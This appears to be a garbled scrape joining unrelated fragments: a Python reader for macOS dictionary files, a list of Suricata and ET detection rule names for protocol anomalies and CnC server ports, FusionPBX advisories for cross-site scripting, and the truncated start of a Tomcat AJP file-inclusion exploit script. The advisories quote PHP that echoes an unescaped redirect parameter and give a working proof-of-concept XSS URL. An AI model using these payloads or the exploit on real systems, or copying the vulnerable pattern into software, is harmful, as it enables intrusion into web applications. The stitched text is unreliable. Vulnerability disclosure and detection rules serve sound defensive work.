| # Thanks to commenters for providing the base of this much nicer implementation! | |
| # Save and run with $ python 0dedict.py | |
| # You may need to hunt down the dictionary files yourself and change the awful path string below. | |
| # This works for me on MacOS 10.14 Mohave | |
| from struct import unpack | |
| from zlib import decompress | |
| import re | |
| filename = '/System/Library/Assets/com_apple_MobileAsset_DictionaryServices_dictionaryOSX/9f5862030e8f00af171924ebbc23ebfd6e91af78.asset/AssetData/Oxford Dictionary of English.dictionary/Contents/Resources/Body.data' | |
| f = open(filename, 'rb') |
| SURICATA Applayer Mismatch protocol both directions | |
| SURICATA Applayer Wrong direction first Data | |
| SURICATA Applayer Detect protocol only one direction | |
| SURICATA Applayer Protocol detection skipped | |
| SURICATA Applayer No TLS after STARTTLS | |
| SURICATA Applayer Unexpected protocol | |
| ET CNC Shadowserver Reported CnC Server Port 80 Group 1 | |
| ET CNC Shadowserver Reported CnC Server Port 81 Group 1 | |
| ET CNC Shadowserver Reported CnC Server Port 443 Group 1 |
Cross-site scripting (XSS) vulnerability in file app/xml_cdr/xml_cdr_search.php line 63 allows remote attackers to inject arbitrary web script or HTML via the redirect parameter.
...
if (strlen(check_str($_GET['redirect'])) > 0) {
echo "<form method='get' action='" . $_GET['redirect'] . ".php'>\n";
}
...
Cross-site scripting (XSS) vulnerability in file app/fax/fax_log_view.php in FusionPBX 4.5.10 allows remote attackers to inject arbitrary web script or HTML via the "fax_uuid" parameter.
proof of concept:
https://domain/app/fax/fax_log_view.php?fax_uuid=123%27%22%3E%3Csvg/onload=alert(document.domain)%3E%3Ca
Fixed:
| #!/usr/bin/env python | |
| #Tomcat-Ajp lfi | |
| import struct | |
| # Some references: | |
| # [url]https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html[/url] | |
| def pack_string(s): | |
| if s is None: | |
| return struct.pack(">h", -1) | |
| l = len(s) |